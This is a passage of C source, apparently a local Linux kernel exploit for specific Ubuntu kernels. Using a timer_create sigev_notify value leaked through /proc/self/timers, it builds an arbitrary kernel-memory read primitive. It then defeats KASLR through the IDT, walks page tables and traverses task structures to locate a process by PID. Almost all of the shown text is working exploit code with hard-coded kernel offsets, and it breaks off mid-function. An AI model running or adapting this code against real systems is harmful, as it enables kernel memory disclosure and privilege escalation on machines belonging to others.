0xffffffff81000000ul \n#define O_DIVIDE_ERROR (0xffffffff81851240ul - KERNEL_START) \n#define O_INIT_TASK (0xffffffff81e13500ul - KERNEL_START) \n#define O_INIT_MM (0xffffffff81e73c80ul - KERNEL_START) \n#define O_PAGE_OFFSET_BASE 0 \n#define O_TASK_STRUCT_TASKS 848 \n#define O_TASK_STRUCT_MM 928 \n#define O_TASK_STRUCT_PID 1096 \n#define O_MM_STRUCT_MMAP 0 \n#define O_MM_STRUCT_PGD 64 \n#define O_VM_AREA_STRUCT_VM_START 0 \n#define O_VM_AREA_STRUCT_VM_END 8 \n#define O_VM_AREA_STRUCT_VM_NEXT 16 \n#define O_VM_AREA_STRUCT_VM_FLAGS 80 \n#endif \n \n#if 0 \n// Ubuntu xenial 4.13.0-38-generic \n#define KERNEL_START 0xffffffff81000000ul \n#define O_DIVIDE_ERROR (0xffffffff81a017b0ul - KERNEL_START) \n#define O_INIT_TASK (0xffffffff82212480ul - KERNEL_START) \n#define O_INIT_MM (0xffffffff82302760ul - KERNEL_START) \n#define O_PAGE_OFFSET_BASE (0xffffffff82248a90ul - KERNEL_START) \n#define O_TASK_STRUCT_TASKS 2048 \n#define O_TASK_STRUCT_MM 2128 \n#define O_TASK_STRUCT_PID 2304 \n#define O_MM_STRUCT_MMAP 0 \n#define O_MM_STRUCT_PGD 80 \n#define O_VM_AREA_STRUCT_VM_START 0 \n#define O_VM_AREA_STRUCT_VM_END 8 \n#define O_VM_AREA_STRUCT_VM_NEXT 16 \n#define O_VM_AREA_STRUCT_VM_FLAGS 80 \n#endif \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#ifndef SYS_memfd_create \n#define SYS_memfd_create 319 \n#endif \n \n#ifndef O_PATH \n#define O_PATH 010000000 \n#endif \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define PAGE_SHIFT 12 \n#define PAGE_SIZE (1ul << PAGE_SHIFT) \n#define PAGE_MASK (~(PAGE_SIZE - 1)) \n \n#define HUGE_PAGE_SHIFT 21 \n#define HUGE_PAGE_SIZE (1ul << HUGE_PAGE_SHIFT) \n#define HUGE_PAGE_MASK (~(HUGE_PAGE_SIZE - 1)) \n \n#define TASK_SIZE (1ul << 47) \n#define PAGE_OFFSET_BASE 0xffff880000000000ul \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define LOG_INFO 1 \n#define LOG_DEBUG 2 \n \n#define log(level, format, args...) \\ \ndo { \\ \nif (level == LOG_INFO) \\ \nprintf(format, ## args); \\ \nelse \\ \nfprintf(stderr, format, ## args); \\ \n} while(0) \n \n#define info(format, args...) log(LOG_INFO, format, ## args) \n \n#if (DEBUG >= 1) \n#define debug1(format, args...) log(LOG_DEBUG, format, ## args) \n#else \n#define debug1(format, args...) \n#endif \n \n#if (DEBUG >= 2) \n#define debug2(format, args...) log(LOG_DEBUG, format, ## args) \n#else \n#define debug2(format, args...) \n#endif \n \n#define min(x, y) ((x) < (y) ? (x) : (y)) \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic void print_chunk(int level, unsigned long src_addr, char *buffer, \nint len, int chunk_size) { \nint i; \n \nassert(len <= chunk_size); \n \nlog(level, \"%016lx: \", src_addr); \nfor (i = 0; i < len; i++) \nlog(level, \"%02hx \", (unsigned char)buffer[i]); \nfor (i = len; i < chunk_size; i++) \nlog(level, \" \"); \n \nlog(level, \" \"); \n \nfor (i = 0; i < len; i++) { \nif (isalnum(buffer[i])) \nlog(level, \"%c\", buffer[i]); \nelse \nlog(level, \".\"); \n} \n \nlog(level, \"\\n\"); \n} \n \nstatic void print_bytes(int level, unsigned long src_addr, char *buffer, \nint len) { \nint chunk_size = 16; \nassert(chunk_size % 2 == 0); \n \nint chunk; \nfor (chunk = 0; chunk < len / chunk_size; chunk++) \nprint_chunk(level, src_addr + chunk * chunk_size, \n&buffer[chunk * chunk_size], chunk_size, chunk_size); \n \nint rem = len % chunk_size; \nif (rem != 0) \nprint_chunk(level, src_addr + len - rem, \n&buffer[len - rem], rem, chunk_size); \n} \n \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define MIN_KERNEL_BASE 0xffffffff81000000ul \n#define MAX_KERNEL_BASE 0xffffffffff000000ul \n#define MAX_KERNEL_IMAGE 0x8000000ul // 128 MB \n \n#define MMAP_ADDR_SPAN (MAX_KERNEL_BASE - MIN_KERNEL_BASE + MAX_KERNEL_IMAGE) \n#define MMAP_ADDR_START 0x200000000ul \n#define MMAP_ADDR_END (MMAP_ADDR_START + MMAP_ADDR_SPAN) \n \n#define OPTIMAL_PTR_OFFSET ((MMAP_ADDR_START - MIN_KERNEL_BASE) / 8) \n// == 0x4fe00000 \n \n#define MAX_MAPPINGS 1024 \n#define MEMFD_SIZE (MMAP_ADDR_SPAN / MAX_MAPPINGS) \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic struct proc_reader g_proc_reader; \nstatic unsigned long g_leak_ptr_addr = 0; \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define PROC_INITIAL_SIZE 1024 \n#define PROC_CHUNK_SIZE 1024 \n \nstruct proc_reader { \nchar *buffer; \nint buffer_size; \nint read_size; \n}; \n \nstatic void proc_init(struct proc_reader* pr) { \ndebug2(\"proc_init: %016lx\\n\", pr); \n \npr->buffer = malloc(PROC_INITIAL_SIZE); \nif (pr->buffer == NULL) { \nperror(\"[-] proc_init: malloc()\"); \nexit(EXIT_FAILURE); \n} \npr->buffer_size = PROC_INITIAL_SIZE; \npr->read_size = 0; \n \ndebug2(\"proc_init = void\\n\"); \n} \n \nstatic void proc_ensure_size(struct proc_reader* pr, int size) { \nif (pr->buffer_size >= size) \nreturn; \nwhile (pr->buffer_size < size) \npr->buffer_size <<= 1; \npr->buffer = realloc(pr->buffer, pr->buffer_size); \nif (pr->buffer == NULL) { \nperror(\"[-] proc_ensure_size: realloc()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nstatic int proc_read(struct proc_reader* pr, const char *file) { \ndebug2(\"proc_read: file: %s, pr->buffer_size: %d\\n\", \nfile, pr->buffer_size); \n \nint fd = open(file, O_RDONLY); \nif (fd == -1) { \nperror(\"[-] proc_read: open()\"); \nexit(EXIT_FAILURE); \n} \n \npr->read_size = 0; \nwhile (true) { \nproc_ensure_size(pr, pr->read_size + PROC_CHUNK_SIZE); \nint bytes_read = read(fd, &pr->buffer[pr->read_size], \nPROC_CHUNK_SIZE); \nif (bytes_read == -1) { \nperror(\"[-] read(proc)\"); \nexit(EXIT_FAILURE); \n} \npr->read_size += bytes_read; \nif (bytes_read < PROC_CHUNK_SIZE) \nbreak; \n} \n \nclose(fd); \n \ndebug2(\"proc_read = %d\\n\", pr->read_size); \nreturn pr->read_size; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \ntypedef union k_sigval { \nint sival_int; \nvoid *sival_ptr; \n} k_sigval_t; \n \n#define __ARCH_SIGEV_PREAMBLE_SIZE (sizeof(int) * 2 + sizeof(k_sigval_t)) \n#define SIGEV_MAX_SIZE 64 \n#define SIGEV_PAD_SIZE ((SIGEV_MAX_SIZE - __ARCH_SIGEV_PREAMBLE_SIZE) \\ \n/ sizeof(int)) \n \ntypedef struct k_sigevent { \nk_sigval_t sigev_value; \nint sigev_signo; \nint sigev_notify; \nunion { \nint _pad[SIGEV_PAD_SIZE]; \nint _tid; \n \nstruct { \nvoid (*_function)(sigval_t); \nvoid *_attribute; \n} _sigev_thread; \n} _sigev_un; \n} k_sigevent_t; \n \nstatic void leak_setup() { \nk_sigevent_t se; \nmemset(&se, 0, sizeof(se)); \nse.sigev_signo = SIGRTMIN; \nse.sigev_notify = OPTIMAL_PTR_OFFSET; \ntimer_t timerid = 0; \n \nint rv = syscall(SYS_timer_create, CLOCK_REALTIME, \n(void *)&se, &timerid); \nif (rv != 0) { \nperror(\"[-] timer_create()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nstatic void leak_parse(char *in, int in_len, char **start, char **end) { \nconst char *needle = \"notify: \"; \n*start = memmem(in, in_len, needle, strlen(needle)); \nassert(*start != NULL); \n*start += strlen(needle); \n \nassert(in_len > 0); \nassert(in[in_len - 1] == '\\n'); \n*end = &in[in_len - 2]; \nwhile (*end > in && **end != '\\n') \n(*end)--; \nassert(*end > in); \nwhile (*end > in && **end != '/') \n(*end)--; \nassert(*end > in); \nassert((*end)[1] = 'p' && (*end)[2] == 'i' && (*end)[3] == 'd'); \n \nassert(*end >= *start); \n} \n \nstatic void leak_once(char **start, char **end) { \nint read_size = proc_read(&g_proc_reader, \"/proc/self/timers\"); \nleak_parse(g_proc_reader.buffer, read_size, start, end); \n} \n \nstatic int leak_once_and_copy(char *out, int out_len) { \nassert(out_len > 0); \n \nchar *start, *end; \nleak_once(&start, &end); \n \nint size = min(end - start, out_len); \nmemcpy(out, start, size); \n \nif (size == out_len) \nreturn size; \n \nout[size] = 0; \nreturn size + 1; \n} \n \nstatic void leak_range(unsigned long addr, size_t length, char *out) { \nsize_t total_leaked = 0; \nwhile (total_leaked < length) { \nunsigned long addr_to_leak = addr + total_leaked; \n*(unsigned long *)g_leak_ptr_addr = addr_to_leak; \ndebug2(\"leak_range: offset %ld, addr: %lx\\n\", \ntotal_leaked, addr_to_leak); \nint leaked = leak_once_and_copy(out + total_leaked, \nlength - total_leaked); \ntotal_leaked += leaked; \n} \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic void mmap_fixed(unsigned long addr, size_t size) { \nvoid *rv = mmap((void *)addr, size, PROT_READ | PROT_WRITE, \nMAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \nif (rv != (void *)addr) { \nperror(\"[-] mmap()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nstatic void mmap_fd_over(int fd, unsigned long fd_size, unsigned long start, \nunsigned long end) { \nint page_size = PAGE_SIZE; \nassert(fd_size % page_size == 0); \nassert(start % page_size == 0); \nassert(end % page_size == 0); \nassert((end - start) % fd_size == 0); \n \ndebug1(\"mmap_fd_over: [%lx, %lx)\\n\", start, end); \n \nunsigned long addr; \nfor (addr = start; addr < end; addr += fd_size) { \nvoid *rv = mmap((void *)addr, fd_size, PROT_READ, \nMAP_FIXED | MAP_PRIVATE, fd, 0); \nif (rv != (void *)addr) { \nperror(\"[-] mmap()\"); \nexit(EXIT_FAILURE); \n} \n} \n \ndebug1(\"mmap_fd_over = void\\n\"); \n} \n \nstatic void remap_fd_over(int fd, unsigned long fd_size, unsigned long start, \nunsigned long end) { \nint rv = munmap((void *)start, end - start); \nif (rv != 0) { \nperror(\"[-] munmap()\"); \nexit(EXIT_FAILURE); \n} \nmmap_fd_over(fd, fd_size, start, end); \n} \n \n#define MEMFD_CHUNK_SIZE 0x1000 \n \nstatic int create_filled_memfd(const char *name, unsigned long size, \nunsigned long value) { \nint i; \nchar buffer[MEMFD_CHUNK_SIZE]; \n \nassert(size % MEMFD_CHUNK_SIZE == 0); \n \nint fd = syscall(SYS_memfd_create, name, 0); \nif (fd < 0) { \nperror(\"[-] memfd_create()\"); \nexit(EXIT_FAILURE); \n} \n \nfor (i = 0; i < sizeof(buffer) / sizeof(value); i++) \n*(unsigned long *)&buffer[i * sizeof(value)] = value; \n \nfor (i = 0; i < size / sizeof(buffer); i++) { \nint bytes_written = write(fd, &buffer[0], sizeof(buffer)); \nif (bytes_written != sizeof(buffer)) { \nperror(\"[-] write(memfd)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nreturn fd; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic const char *evil = \"evil\"; \nstatic const char *good = \"good\"; \n \nstatic bool bisect_probe() { \nchar *start, *end; \nleak_once(&start, &end); \nreturn *start == 'g'; \n} \n \nstatic unsigned long bisect_via_memfd(unsigned long fd_size, \nunsigned long start, unsigned long end) { \nassert((end - start) % fd_size == 0); \n \nint fd_evil = create_filled_memfd(\"evil\", fd_size, (unsigned long)evil); \nint fd_good = create_filled_memfd(\"good\", fd_size, (unsigned long)good); \n \nunsigned long left = 0; \nunsigned long right = (end - start) / fd_size; \n \nwhile (right - left > 1) { \nunsigned long middle = left + (right - left) / 2; \nremap_fd_over(fd_evil, fd_size, start + left * fd_size, \nstart + middle * fd_size); \nremap_fd_over(fd_good, fd_size, start + middle * fd_size, \nstart + right * fd_size); \nbool probe = bisect_probe(); \nif (probe) \nleft = middle; \nelse \nright = middle; \n} \n \nint rv = munmap((void *)start, end - start); \nif (rv != 0) { \nperror(\"[-] munmap()\"); \nexit(EXIT_FAILURE); \n} \n \nclose(fd_evil); \nclose(fd_good); \n \nreturn start + left * fd_size; \n} \n \nstatic unsigned long bisect_via_assign(unsigned long start, unsigned long end) { \nint word_size = sizeof(unsigned long); \n \nassert((end - start) % word_size == 0); \nassert((end - start) % PAGE_SIZE == 0); \n \nmmap_fixed(start, end - start); \n \nunsigned long left = 0; \nunsigned long right = (end - start) / word_size; \n \nwhile (right - left > 1) { \nunsigned long middle = left + (right - left) / 2; \nunsigned long a; \nfor (a = left; a < middle; a++) \n*(unsigned long *)(start + a * word_size) = \n(unsigned long)evil; \nfor (a = middle; a < right; a++) \n*(unsigned long *)(start + a * word_size) = \n(unsigned long)good; \nbool probe = bisect_probe(); \nif (probe) \nleft = middle; \nelse \nright = middle; \n} \n \nint rv = munmap((void *)start, end - start); \nif (rv != 0) { \nperror(\"[-] munmap()\"); \nexit(EXIT_FAILURE); \n} \n \nreturn start + left * word_size; \n} \n \nstatic unsigned long bisect_leak_ptr_addr() { \nunsigned long addr = bisect_via_memfd( \nMEMFD_SIZE, MMAP_ADDR_START, MMAP_ADDR_END); \ndebug1(\"%lx %lx\\n\", addr, addr + MEMFD_SIZE); \naddr = bisect_via_memfd(PAGE_SIZE, addr, addr + MEMFD_SIZE); \ndebug1(\"%lx %lx\\n\", addr, addr + PAGE_SIZE); \naddr = bisect_via_assign(addr, addr + PAGE_SIZE); \ndebug1(\"%lx\\n\", addr); \nreturn addr; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define CPUINFO_SMEP 1 \n#define CPUINFO_SMAP 2 \n#define CPUINFO_KAISER 4 \n#define CPUINFO_PTI 8 \n \nstatic int cpuinfo_scan() { \nint length = proc_read(&g_proc_reader, \"/proc/cpuinfo\"); \nchar *buffer = &g_proc_reader.buffer[0]; \nint rv = 0; \nchar* found = memmem(buffer, length, \"smep\", 4); \nif (found != NULL) \nrv |= CPUINFO_SMEP; \nfound = memmem(buffer, length, \"smap\", 4); \nif (found != NULL) \nrv |= CPUINFO_SMAP; \nfound = memmem(buffer, length, \"kaiser\", 4); \nif (found != NULL) \nrv |= CPUINFO_KAISER; \nfound = memmem(buffer, length, \" pti\", 4); \nif (found != NULL) \nrv |= CPUINFO_PTI; \nreturn rv; \n} \n \nstatic void cpuinfo_check() { \nint rv = cpuinfo_scan(); \nif (rv & CPUINFO_SMAP) { \ninfo(\"[-] SMAP detected, no bypass available, aborting\\n\"); \nexit(EXIT_FAILURE); \n} \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic void arbitrary_read_init() { \ninfo(\"[.] setting up proc reader\\n\"); \nproc_init(&g_proc_reader); \ninfo(\"[~] done\\n\"); \n \ninfo(\"[.] checking /proc/cpuinfo\\n\"); \ncpuinfo_check(); \ninfo(\"[~] looks good\\n\"); \n \ninfo(\"[.] setting up timer\\n\"); \nleak_setup(); \ninfo(\"[~] done\\n\"); \n \ninfo(\"[.] finding leak pointer address\\n\"); \ng_leak_ptr_addr = bisect_leak_ptr_addr(); \ninfo(\"[+] done: %016lx\\n\", g_leak_ptr_addr); \n \ninfo(\"[.] mapping leak pointer page\\n\"); \nmmap_fixed(g_leak_ptr_addr & ~(PAGE_SIZE - 1), PAGE_SIZE); \ninfo(\"[~] done\\n\"); \n} \n \nstatic void read_range(unsigned long addr, size_t length, char *buffer) { \nleak_range(addr, length, buffer); \n} \n \nstatic uint64_t read_8(unsigned long addr) { \nuint64_t result; \nread_range(addr, sizeof(result), (char *)&result); \nreturn result; \n} \n \nstatic uint32_t read_4(unsigned long addr) { \nuint32_t result; \nread_range(addr, sizeof(result), (char *)&result); \nreturn result; \n} \n \nstatic uint64_t read_field_8(unsigned long addr, int offset) { \nreturn read_8(addr + offset); \n} \n \nstatic uint64_t read_field_4(unsigned long addr, int offset) { \nreturn read_4(addr + offset); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstruct idt_register { \nuint16_t length; \nuint64_t base; \n} __attribute__((packed)); \n \nstruct idt_gate { \nuint16_t offset_1; // bits 0..15 \nuint32_t shit_1; \nuint16_t offset_2; // bits 16..31 \nuint32_t offset_3; // bits 32..63 \nuint32_t shit_2; \n} __attribute__((packed)); \n \nstatic uint64_t idt_gate_addr(struct idt_gate *gate) { \nuint64_t addr = gate->offset_1 + ((uint64_t)gate->offset_2 << 16) + \n((uint64_t)gate->offset_3 << 32); \nreturn addr; \n} \n \nstatic void get_idt(struct idt_register *idtr) { \nasm ( \"sidt %0\" : : \"m\"(*idtr) ); \ndebug1(\"get_idt_base: base: %016lx, length: %d\\n\", \nidtr->base, idtr->length); \n} \n \nstatic void print_idt(int entries) { \nchar buffer[4096]; \nstruct idt_register idtr; \nint i; \n \nget_idt(&idtr); \nassert(idtr.length <= sizeof(buffer)); \nread_range(idtr.base, idtr.length, &buffer[0]); \n \ninfo(\"base: %016lx, length: %d\\n\", idtr.base, \n(int)idtr.length); \n \nentries = min(entries, idtr.length / sizeof(struct idt_gate)); \nfor (i = 0; i < entries; i++) { \nstruct idt_gate *gate = (struct idt_gate *)&buffer[0] + i; \nuint64_t addr = idt_gate_addr(gate); \ninfo(\"gate #%03d: %016lx\\n\", i, addr); \n} \n} \n \nstatic uint64_t read_idt_gate(int i) { \nchar buffer[4096]; \nstruct idt_register idtr; \n \nget_idt(&idtr); \nassert(idtr.length <= sizeof(buffer)); \nassert(i <= idtr.length / sizeof(struct idt_gate)); \nread_range(idtr.base, idtr.length, &buffer[0]); \n \nstruct idt_gate *gate = (struct idt_gate *)&buffer[0] + i; \nuint64_t addr = idt_gate_addr(gate); \nreturn addr; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define PTRS_PER_PGD 512 \n#define PTRS_PER_PUD 512 \n#define PTRS_PER_PMD 512 \n#define PTRS_PER_PTE 512 \n \n#define PGD_SHIFT 39 \n#define PUD_SHIFT 30 \n#define PMD_SHIFT 21 \n \n#define pgd_index(addr) (((addr) >> PGD_SHIFT) & (PTRS_PER_PGD - 1)) \n#define pud_index(addr) (((addr) >> PUD_SHIFT) & (PTRS_PER_PUD - 1)) \n#define pmd_index(addr) (((addr) >> PMD_SHIFT) & (PTRS_PER_PMD - 1)) \n#define pte_index(addr) (((addr) >> PAGE_SHIFT) & (PTRS_PER_PTE - 1)) \n \n#define _PAGE_BIT_PRESENT 0 \n#define _PAGE_BIT_ACCESSED 5 \n#define _PAGE_BIT_DIRTY 6 \n#define _PAGE_BIT_PSE 7 \n#define _PAGE_BIT_GLOBAL 8 \n#define _PAGE_BIT_PROTNONE _PAGE_BIT_GLOBAL \n \n#define _PAGE_PRESENT (1ul << _PAGE_BIT_PRESENT) \n#define _PAGE_ACCESSED (1ul << _PAGE_BIT_ACCESSED) \n#define _PAGE_DIRTY (1ul << _PAGE_BIT_DIRTY) \n#define _PAGE_PSE (1ul << _PAGE_BIT_PSE) \n#define _PAGE_PROTNONE (1ul << _PAGE_BIT_PROTNONE) \n#define _PAGE_KNL_ERRATUM_MASK (_PAGE_DIRTY | _PAGE_ACCESSED) \n \n#define pgd_none(value) ((value) == 0) \n#define pud_none(value) (((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0) \n#define pmd_none(value) (((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0) \n#define pte_none(value) (((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0) \n \n#define __PHYSICAL_MASK_SHIFT 52 \n#define __PHYSICAL_MASK ((1ul << __PHYSICAL_MASK_SHIFT) - 1) \n#define PHYSICAL_PAGE_MASK (PAGE_MASK & __PHYSICAL_MASK) \n#define PTE_PFN_MASK (PHYSICAL_PAGE_MASK) \n#define PTE_FLAGS_MASK (~PTE_PFN_MASK) \n \n#define pgd_flags(value) (value & PTE_FLAGS_MASK) \n#define pud_flags(value) (value & PTE_FLAGS_MASK) \n#define pmd_flags(value) (value & PTE_FLAGS_MASK) \n#define pte_flags(value) (value & PTE_FLAGS_MASK) \n \n#define pgd_present(value) (pgd_flags(value) & _PAGE_PRESENT) \n#define pud_present(value) (pud_flags(value) & _PAGE_PRESENT) \n#define pmd_present(value) (pmd_flags(value) & (_PAGE_PRESENT | \\ \n_PAGE_PROTNONE | _PAGE_PSE)) \n#define pte_present(value) (pte_flags(value) & (_PAGE_PRESENT | \\ \n_PAGE_PROTNONE)) \n \nstruct pte_entry { \nunsigned long addr; \nunsigned long entries[PTRS_PER_PTE]; \n}; \n \nstruct pmd_entry { \nunsigned long addr; \nstruct { \nbool huge; \nunion { \nstruct pte_entry *pte; \nunsigned long phys; \n}; \n} entries[PTRS_PER_PMD]; \n}; \n \nstruct pud_entry { \nunsigned long addr; \nstruct pmd_entry *entries[PTRS_PER_PUD]; \n}; \n \nstruct pgd_entry { \nunsigned long addr; \nstruct pud_entry *entries[PTRS_PER_PGD]; \n}; \n \nstruct ptsc { \nunsigned long physmap; \nstruct pgd_entry entry; \n}; \n \nstatic struct pte_entry *ptsc_alloc_pte_entry(unsigned long addr) { \nstruct pte_entry *entry = malloc(sizeof(*entry)); \nif (!entry) { \nperror(\"[-] malloc()\"); \nexit(EXIT_FAILURE); \n} \nentry->addr = addr; \nmemset(&entry->entries[0], 0, sizeof(entry->entries)); \nreturn entry; \n} \n \nstatic struct pmd_entry *ptsc_alloc_pmd_entry(unsigned long addr) { \nstruct pmd_entry *entry = malloc(sizeof(*entry)); \nif (!entry) { \nperror(\"[-] malloc()\"); \nexit(EXIT_FAILURE); \n} \nentry->addr = addr; \nmemset(&entry->entries[0], 0, sizeof(entry->entries)); \nreturn entry; \n} \n \nstatic struct pud_entry *ptsc_alloc_pud_entry(unsigned long addr) { \nstruct pud_entry *entry = malloc(sizeof(*entry)); \nif (!entry) { \nperror(\"[-] malloc()\"); \nexit(EXIT_FAILURE); \n} \nentry->addr = addr; \nmemset(&entry->entries[0], 0, sizeof(entry->entries)); \nreturn entry; \n} \n \nstatic void ptsc_init(struct ptsc* ptsc, unsigned long physmap, \nunsigned long pgd) { \nptsc->physmap = physmap; \nptsc->entry.addr = pgd; \nmemset(&ptsc->entry.entries[0], 0, sizeof(ptsc->entry.entries)); \n} \n \nstatic unsigned long ptsc_page_virt_to_phys(struct ptsc* ptsc, \nunsigned long addr) { \nstruct pgd_entry *pgd_e; \nstruct pud_entry *pud_e; \nstruct pmd_entry *pmd_e; \nstruct pte_entry *pte_e; \nunsigned long phys_a; \nint index; \n \ndebug1(\"looking up phys addr for %016lx:\\n\", addr); \n \npgd_e = &ptsc->entry; \n \nindex = pgd_index(addr); \ndebug1(\" pgd: %016lx, index: %d\\n\", pgd_e->addr, index); \nif (!pgd_e->entries[index]) { \nunsigned long pgd_v = read_8( \npgd_e->addr + index * sizeof(unsigned long)); \ndebug1(\" -> %016lx\\n\", pgd_v); \nif (pgd_none(pgd_v)) { \ndebug1(\" not found, pgd is none\\n\"); \nreturn 0; \n} \nif (!pgd_present(pgd_v)) { \ndebug1(\" not found, pgd is not present\\n\"); \nreturn 0; \n} \nunsigned long pud_a = \nptsc->physmap + (pgd_v & PHYSICAL_PAGE_MASK); \npud_e = ptsc_alloc_pud_entry(pud_a); \npgd_e->entries[index] = pud_e; \n} \npud_e = pgd_e->entries[index]; \n \nindex = pud_index(addr); \ndebug1(\" pud: %016lx, index: %d\\n\", pud_e->addr, index); \nif (!pud_e->entries[index]) { \nunsigned long pud_v = read_8( \npud_e->addr + index * sizeof(unsigned long)); \ndebug1(\" -> %016lx\\n\", pud_v); \nif (pud_none(pud_v)) { \ndebug1(\" not found, pud is none\\n\"); \nreturn 0; \n} \nif (!pud_present(pud_v)) { \ndebug1(\" not found, pud is not present\\n\"); \nreturn 0; \n} \nunsigned long pmd_a = \nptsc->physmap + (pud_v & PHYSICAL_PAGE_MASK); \npmd_e = ptsc_alloc_pmd_entry(pmd_a); \npud_e->entries[index] = pmd_e; \n} \npmd_e = pud_e->entries[index]; \n \nindex = pmd_index(addr); \ndebug1(\" pmd: %016lx, index: %d\\n\", pmd_e->addr, index); \nif (!pmd_e->entries[index].pte) { \nunsigned long pmd_v = read_8( \npmd_e->addr + index * sizeof(unsigned long)); \ndebug1(\" -> %016lx\\n\", pmd_v); \nif (pmd_none(pmd_v)) { \ndebug1(\" not found, pmd is none\\n\"); \nreturn 0; \n} \nif (!pmd_present(pmd_v)) { \ndebug1(\" not found, pmd is not present\\n\"); \nreturn 0; \n} \nif (pmd_flags(pmd_v) & _PAGE_PSE) { \nphys_a = ptsc->physmap + (pmd_v & PHYSICAL_PAGE_MASK) + \n(addr & ~HUGE_PAGE_MASK); \npmd_e->entries[index].phys = phys_a; \npmd_e->entries[index].huge = true; \n} else { \nunsigned long pte_a = \nptsc->physmap + (pmd_v & PHYSICAL_PAGE_MASK); \npte_e = ptsc_alloc_pte_entry(pte_a); \npmd_e->entries[index].pte = pte_e; \npmd_e->entries[index].huge = false; \n} \n} \n \nif (pmd_e->entries[index].huge) { \ndebug1(\" phy: %016lx (huge)\\n\", phys_a); \nreturn pmd_e->entries[index].phys; \n} \n \npte_e = pmd_e->entries[index].pte; \n \nindex = pte_index(addr); \ndebug1(\" pte: %016lx, index: %d\\n\", pte_e->addr, index); \nif (!pte_e->entries[index]) { \nunsigned long pte_v = read_8( \npte_e->addr + index * sizeof(unsigned long)); \ndebug1(\" -> %016lx\\n\", pte_v); \nif (pte_none(pte_v)) { \ndebug1(\" not found, pte is none\\n\"); \nreturn 0; \n} \nif (!pte_present(pte_v)) { \ndebug1(\" not found, pte is not present\\n\"); \nreturn 0; \n} \nphys_a = ptsc->physmap + (pte_v & PHYSICAL_PAGE_MASK) + \n(addr & ~PAGE_MASK); \npte_e->entries[index] = phys_a; \n} \nphys_a = pte_e->entries[index]; \n \nreturn phys_a; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic unsigned long find_task_by_pid(unsigned long init_task, unsigned pid) { \nunsigned long cur_task = init_task; \n \nwhile (true) { \nunsigned cur_pid = \nread_field_4(cur_task, O_TASK_STRUCT_PID); \nif (cur_pid == pid) \nreturn cur_task; \nunsigned long task_next_ptr = \nread_field_8(cur_task, O_TASK_STRUCT_TASKS); \ncur_task = task_next_ptr - O_TASK_STRUCT_TASKS; \nif (cur_task == init_task) \nreturn 0; \n} \n} \n \n#define MAX_MMAPS_PER_TASK 512 \n \nstruct mmap_entry { \nunsigned long start; \nunsigned long end; \nunsigned flags; \n}; \n \ntypedef void (*mmap_callback)(struct mmap_entry *entry, void *private); \n \nstatic void for_each_mmap_from(unsigned long mmap, mmap_callback callback, \nvoid *private) { \nstruct mmap_entry entries[MAX_MMAPS_PER_TASK]; \nint i, count; \n \ncount = 0; \nwhile (mmap != 0) { \nassert(count < MAX_MMAPS_PER_TASK); \nunsigned long vm_start = \nread_field_8(mmap, O_VM_AREA_STRUCT_VM_START); \nunsigned long vm_end = \nread_field_8(mmap, O_VM_AREA_STRUCT_VM_END); \nif (vm_start >= TASK_SIZE || vm_end >= TASK_SIZE) { \ninfo(\"[-] bad mmap (did the task die?)\\n\"); \nexit(EXIT_FAILURE); \n} \nunsigned vm_flags = \nread_field_4(mmap, O_VM_AREA_STRUCT_VM_FLAGS); \nentries[count].start = vm_start; \nentries[count].end = vm_end; \nentries[count].flags = vm_flags; \ncount++; \nmmap = read_field_8(mmap, O_VM_AREA_STRUCT_VM_NEXT); \n} \n \nfor (i = 0; i < count; i++) \ncallback(&entries[i], private); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic unsigned long g_kernel_text = 0; \nstatic unsigned long g_physmap = 0; \n \nstatic struct ptsc g_ptsc; \n \nstatic void physmap_init() { \nunsigned long divide_error = read_idt_gate(0); \ninfo(\"[.] divide_error: %016lx\\n\", divide_error); \n \ng_kernel_text = divide_error - O_DIVIDE_ERROR; \ninfo(\"[.] kernel text: %016lx\\n\", g_kernel_text); \n \nif (O_PAGE_OFFSET_BASE) { 